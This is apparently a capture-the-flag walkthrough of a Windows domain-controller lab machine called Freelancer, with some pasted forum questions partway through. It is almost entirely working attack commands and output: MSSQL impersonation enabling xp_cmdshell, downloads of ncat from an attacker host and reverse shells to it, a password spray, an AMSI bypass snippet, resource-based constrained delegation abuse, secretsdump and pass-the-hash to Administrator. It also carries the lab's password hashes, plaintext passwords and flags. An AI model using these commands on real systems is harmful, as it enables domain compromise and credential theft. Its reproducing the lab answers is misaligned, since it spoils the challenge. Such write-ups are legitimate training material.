TCP Scan

> TARGET=10.129.69.99 && nmap -p$(nmap -p- --min-rate=1000 -T4 $TARGET -Pn | grep ^[0-9] | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//) -sC -sV -Pn -vvv $TARGET -oN nmap_tcp_all.nmap

PORT      STATE SERVICE       REASON          VERSION
53/tcp    open  domain        syn-ack ttl 127 Simple DNS Plus
80/tcp    open  http          syn-ack ttl 127 nginx 1.25.5
|_http-title: Did not follow redirect to http://freelancer.htb/
|_http-server-header: nginx/1.25.5
| http-methods:
|_  Supported Methods: GET HEAD POST OPTIONS
88/tcp    open  kerberos-sec  syn-ack ttl 127 Microsoft Windows Kerberos (server time: 2024-06-02 03:28:45Z)
135/tcp   open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
139/tcp   open  netbios-ssn   syn-ack ttl 127 Microsoft Windows netbios-ssn
389/tcp   open  ldap          syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: freelancer.htb0., Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds? syn-ack ttl 127
464/tcp   open  kpasswd5?     syn-ack ttl 127
593/tcp   open  ncacn_http    syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped    syn-ack ttl 127
3268/tcp  open  ldap          syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: freelancer.htb0., Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped    syn-ack ttl 127
5985/tcp  open  http          syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp  open  mc-nmf        syn-ack ttl 127 .NET Message Framing
49666/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
49670/tcp open  ncacn_http    syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
49671/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
49672/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
51703/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
51707/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows
|_    Message signing enabled and required
  • add host
echo '10.129.69.99    freelancer.htb' >> /etc/hosts

enum

> enum4linux freelancer.htb
Domain Name: FREELANCER
Domain Sid: S-1-5-21-3542429192-2036945976-3483670807

userenum

http://freelancer.htb/accounts/login/otp/Mgo=/65018e8fbb17e2fd5bd0d0982c8f92b7/
  • now, you are logged in as admin johnHalond@freelancer.htb

foothold

  • go to /admin and execute SQL command
SELECT * FROM INFORMATION_SCHEMA.TABLES;

pbkdf2_sha256$600000$IgjtPcBB9VySMPXoeAc8PL$pmpMU81uwwKvdxUBNVk/K4Wwh4pw/fWIseSx4XkyMJo=    admin
pbkdf2_sha256$600000$tip7FkNIoN7nKNTLckQuiY$Q6g1Qx0B8ul/qxGQ0hX4lYoHc3jxkrWaf3lZvNknfWU=    Camellia19970
pbkdf2_sha256$600000$x9n1jiojmHAAzp3RSfvh3A$UmFMGDpFb6Gjz1XHmqNoO2eH7+7kYFfrDahLkJGpoUo=    crista.W
pbkdf2_sha256$600000$R9zyIpTUoHWkY3OK9mDf80$Qzm3CzI3RN6sJ3c8Ntuif9hqjZCIe+J9DxQGgPgVc3I=    ItachiUchiha
pbkdf2_sha256$600000$4KqR8oqlwUMVVjZuzbz4Wu$2mdmIWr5SyIdLBngGve3pZyS1KaOO4+hlXgmxAeGtVs=    JohntheCarter
pbkdf2_sha256$600000$jP0nxcmm3rWlUWkf1xBqhE$mnABoJ2VkzyUi1LC+IuwjJZOs4/z6yqQG4tpJy1b86A=    Jonathon.R
pbkdf2_sha256$600000$n807xz2S84KMIXaCE1d8cd$HS+8AffbYcIHSXTE7LoYtTiJRAmAqrkq7o+RAqZDPys=    lisa.Ar
pbkdf2_sha256$600000$sLNgktJGLeN8BE9mzu7ZaH$dDbEJQWTdNGhw0xfJKzBvAhg+6Ag76WaXeFgjUKE89U=    Markos
pbkdf2_sha256$600000$BYsJKIsg3DqI3DxZ08AL5t$4NYhZbnmJY7qQOsZADGbdDZk5EyS7NBv0NVA21LKLs0=    martin1234
pbkdf2_sha256$600000$Vv05zVNTevRy9j29n3nnmC$WIrntfpqMYGv7x79UZtOXOLOmnskyHItdxKMzh0BPRY=    maya001
pbkdf2_sha256$600000$ItLrs0zNKnvHpa8x81YUET$znvkVByIaU8U+s41mE6RjOd9yrpe1DLBF/l76bMznwo=    Philippos
pbkdf2_sha256$600000$eyWcuxHnbIoONyvdQ3tZaM$TN4+gH91PqmpGSKpDZiivK1TqGbNfXErBEa558isebo=    SaraArkhader
pbkdf2_sha256$600000$ok26XbM8us6jrG4BvlsM6h$IZbj6fZzUIagbziFSpPP68olFK7yrUCFTAZmK7qo7co=    test
pbkdf2_sha256$600000$LCdispX2eABGjp4wQpAkZt$UqGIDDNd9Mnkoa8xMw3DTvW9x50JSV94OALXBNNtisw=    test1
pbkdf2_sha256$600000$6z0gkQxAgg6ttMJUL1MKLE$iDl9amRUgVNXxVAsUaPhjVKvqgS6i5EETFeFZKlr3e0=    tomHazard
  • upgrade user to sysadmin
EXECUTE AS LOGIN = 'SA';
EXEC sp_addsrvrolemember 'Freelancer_webapp_user', 'sysadmin';
sp_configure 'Show Advanced Options', 1
RECONFIGURE
sp_configure 'xp_cmdshell', 1
RECONFIGURE
  • reverse shell
EXEC master..xp_cmdshell 'curl -s http://10.10.14.58/ncat.exe -o c:\Users\sql_svc\Desktop\ncat.exe'
EXEC master..xp_cmdshell 'curl -s http://10.10.14.58/libssl-3.dll -o c:\Users\sql_svc\Desktop\libssl-3.dll'
EXEC master..xp_cmdshell 'curl -s http://10.10.14.58/libcrypto-3.dll -o c:\Users\sql_svc\Desktop\libcrypto-3.dll'
EXEC xp_cmdshell 'c:\Users\sql_svc\Desktop\ncat.exe 10.10.14.58 4444 -e cmd.exe'

user: mikasaAckerman

  • found password in
c:\Users\sql_svc\Downloads\SQLEXPR-2019_x64_ENU>type sql-Configuration.INI
type sql-Configuration.INI
[OPTIONS]
ACTION="Install"
QUIET="True"
FEATURES=SQL
INSTANCENAME="SQLEXPRESS"
INSTANCEID="SQLEXPRESS"
RSSVCACCOUNT="NT Service\ReportServer$SQLEXPRESS"
AGTSVCACCOUNT="NT AUTHORITY\NETWORK SERVICE"
AGTSVCSTARTUPTYPE="Manual"
COMMFABRICPORT="0"
COMMFABRICNETWORKLEVEL=""0"
COMMFABRICENCRYPTION="0"
MATRIXCMBRICKCOMMPORT="0"
SQLSVCSTARTUPTYPE="Automatic"
FILESTREAMLEVEL="0"
ENABLERANU="False"
SQLCOLLATION="SQL_Latin1_General_CP1_CI_AS"
SQLSVCACCOUNT="FREELANCER\sql_svc"
SQLSVCPASSWORD="IL0v3ErenY3ager"
SQLSYSADMINACCOUNTS="FREELANCER\Administrator"
SECURITYMODE="SQL"
SAPWD="t3mp0r@ryS@PWD"
ADDCURRENTUSERASSQLADMIN="False"
TCPENABLED="1"
NPENABLED="1"
BROWSERSVCSTARTUPTYPE="Automatic"
IAcceptSQLServerLicenseTerms=True
  • compose user and password lists
# users.txt
Administrator
alex.hill
carol.poland
d.jones
dthomas
ereed
Ethan.l
evelyn.adams
Guest
hking
jen.brown
jgreen
jmartinez
krbtgt
leon.sk
lkazanof
lorra199
maya.artmes
michael.williams
mikasaAckerman
olivia.garcia
samuel.turner
sdavis
sophia.h
sql_svc
SQLBackupOperator
sshd
taylor
wwalker

# passwords.txt
IL0v3ErenY3ager
t3mp0r@ryS@PWD
  • password spray
> crackmapexec smb freelancer.htb -u users.txt -p passwords.txt
SMB         freelancer.htb  445    DC               [+] freelancer.htb\mikasaAckerman:IL0v3ErenY3ager

.\RunasCs.exe mikasaAckerman IL0v3ErenY3ager cmd.exe -r 10.10.14.58:443

c:\Users\mikasaAckerman\Desktop>type user.txt
type user.txt
9971bcc8b11abfa6b6bb14e3fe00c1a3

user: lorra199

c:\Users\mikasaAckerman\Desktop>type mail.txt
Hello Mikasa,
I tried once again to work with Liza Kazanoff after seeking her help to troubleshoot the BSOD issue on the "DATACENTER-2019" computer. As you know, the problem started occurring after we installed the new update of SQL Server 2019.
I attempted the solutions you provided in your last email, but unfortunately, there was no improvement. Whenever we try to establish a remote SQL connection to the installed instance, the server's CPU starts overheating, and the RAM usage keeps increasing until the BSOD appears, forcing the server to restart.
Nevertheless, Liza has requested me to generate a full memory dump on the Datacenter and send it to you for further assistance in troubleshooting the issue.
Best regards,
  • re-upload ncat
curl http://10.10.14.58/ncat.exe -o c:\temp\ncat.exe
curl http://10.10.14.58/libssl-3.dll -o c:\temp\libssl-3.dll
curl http://10.10.14.58/libcrypto-3.dll -o c:\temp\libcrypto-3.dll
  • download the MEMORY.7z file
c:\temp\ncat.exe 10.10.14.58 6666 < MEMORY.7z

https://github.com/ufrisk/MemProcFS
this may be useful then try bypass AMSI and dump something

Grab the 3 hives and dump the passwords
impacket-secretsdump -sam SAM.reghive -system SYSTEM.reghive -security SECURITY.reghive local

Where it says "Unknown User" is the password for lorra199. You can use runascs again or evil-winrm.

I'm currently stuck doing the dcsync.
I have created a new machineaccount with msds-allowedtoactonbehalfofotheridentity and can create a ccache ticket with getST.
But secrets-dump keeps failing with STATUS_MORE_PROCESSING_REQUIRED.

Not sure if I'm doing something wrong or something is broken. I also keep having to sync clocks because of skew.
Any hints?

I have  used this tool that somebody linked earlier:
https://github.com/ufrisk/MemProcFS

Then grabbed the ...MACHINE_SYSTEM.reghive etc. from registry\hive_files
  • login as lorra199
evil-winrm -i freelancer.htb -u lorra199 -p PWN3D#l0rr@Armessa199

user: liza.kazanof

  • list deleted objects
Get-ADObject -filter 'isdeleted -eq $true -and name -ne "Deleted Objects"' -includeDeletedObjects -property *

memberOf: {CN=Remote Management Users,CN=Builtin,DC=freelancer,DC=htb, CN=Backup Operators,CN=Builtin,DC=freelancer,DC=htb}
  • restore liza.kazanof, in Backup Operators group
# get the guid of existing user
Get-ADObject -filter ' name -eq "Liza Kazanof"' -property *
# remove the existing user
remove-adobject -identity 501442ec-1e03-4451-949b-4770f98b7f52
# restore the deleted user
Restore-ADObject -identity ebe15df5-e265-45ec-b7fc-359877217138 -NewName liza.kazanof

# upload ncat
*Evil-WinRM* PS C:\temp> curl http://10.10.14.58/ncat.exe -o C:\temp\ncat.exe
*Evil-WinRM* PS C:\temp> curl http://10.10.14.58/libssl-3.dll -o C:\temp\libssl-3.dll
*Evil-WinRM* PS C:\temp> curl http://10.10.14.58/libcrypto-3.dll -o C:\temp\libcrypto-3.dll

$SecPassword = ConvertTo-SecureString 'RockYou!' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('liza.kazanof', $SecPassword)
$session = New-PSSession -Credential $Cred
Invoke-Command -Session $session -scriptblock { c:\temp\ncat.exe 10.10.14.58 5555 -e powershell.exe }

root

$a = [Ref].Assembly.GetTypes() | ?{$_.Name -like '*siUtils'}
$b = $a.GetFields('NonPublic,Static') | ?{$_.Name -like '*siContext'}
[IntPtr]$c = $b.GetValue($null)
[Int32[]]$d = @(0xff)
[System.Runtime.InteropServices.Marshal]::Copy($d, 0, $c, 1)

curl http://10.10.14.58/PowerView.ps1 -o PowerView.ps1
curl http://10.10.14.58/PowerMad.ps1 -o PowerMad.ps1
Import-Module .\PowerView.ps1
Import-Module .\PowerMad.ps1
  • create new attacker machine
New-MachineAccount -MachineAccount attackersystem -Password $(ConvertTo-SecureString 'Summer2018!' -AsPlainText -Force)
$ComputerSid = Get-DomainComputer attackersystem -Properties objectsid | Select -Expand objectsid
$SD = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList "O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;$($ComputerSid))"
$SDBytes = New-Object byte[] ($SD.BinaryLength)
$SD.GetBinaryForm($SDBytes, 0)
Get-DomainComputer DC | Set-DomainObject -Set @{'msds-allowedtoactonbehalfofotheridentity'=$SDBytes}
  • get tgt
rdate -n freelancer.htb && impacket-getST -spn 'cifs/dc.freelancer.htb' -impersonate 'Administrator' 'freelancer/attackersystem$:Summer2018!' -dc-ip dc.freelancer.htb
  • dump secrets
rdate -n freelancer.htb && KRB5CCNAME=Administrator@cifs_dc.freelancer.htb@FREELANCER.HTB.ccache impacket-secretsdump freelancer/administrator@dc.freelancer.htb -k -no-pass
  • login and get flag
evil-winrm -i dc.freelancer.htb -u administrator -H 0039318f1e8274633445bce32ad1a290

Evil-WinRM shell v3.5

Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine

Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> cd ..
*Evil-WinRM* PS C:\Users\Administrator> cd desktop
*Evil-WinRM* PS C:\Users\Administrator\desktop> ls


    Directory: C:\Users\Administrator\desktop


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-ar---         6/3/2024   7:30 AM             34 root.txt


ty*Evil-WinRM* PS C:\Users\Administrator\desktop> type root.txt
b69fbe378351f45e2414380b31d5c6e5

Support meowmeow

If you find this article useful, please support: https://www.buymeacoffee.com/meowmeowattack